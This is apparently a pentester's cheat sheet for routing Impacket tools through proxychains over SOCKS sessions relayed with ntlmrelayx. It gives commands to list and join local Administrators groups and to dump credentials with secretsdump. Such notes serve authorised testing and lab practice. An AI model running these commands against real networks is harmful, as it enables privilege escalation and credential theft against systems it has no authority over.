proxychains

Configure proxy chains

For most offsec tooling, on your Kali box you'll want to open /etc/proxychains4.conf and change the last line from socks4 127.0.0.1 9050 to 1080 like so:

[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 1080

Running offsec tools through proxychains

mssqlclient.py

proxychains mssqlclient.py 'NETBIOSOFDOMAIN/SERVER01$'@10.2.3.4 -windows-auth -no-pass

mssqlkaren

proxychains uv run mssqlkaren.py ludus/domainadmin:password@10.6.10.13 -windows-auth

net.py

Find local admins:

# Make sure the machine name, IP etc matches what your socks proxy shows in ntlmrelayx
proxychains net.py 'NETBIOSOFDOMAIN/SERVER01$'@10.2.3.4 localgroup -name Administrators

# Just hit Enter when asked for a password

Add yourself (LOWPRIV) to local admin group:

# Make sure the machine name, IP etc matches what your socks proxy shows in ntlmrelayx
proxychains net.py 'NETBIOSOFDOMAIN/SERVER01$'@10.2.3.4 localgroup -name Administrators -join lowpriv

ntlmrelayx

If you've snagged some proxy connections using something like ntlmrelay, you can use proxychains to push tools like secretsdump through it:

sudo proxychains python3 /opt/impacket/examples/secretsdump.py DOMAINNAME/ACCOUNT:password-doesnt-matter-type-whatever-you-want-here@ip.of.proxy.victim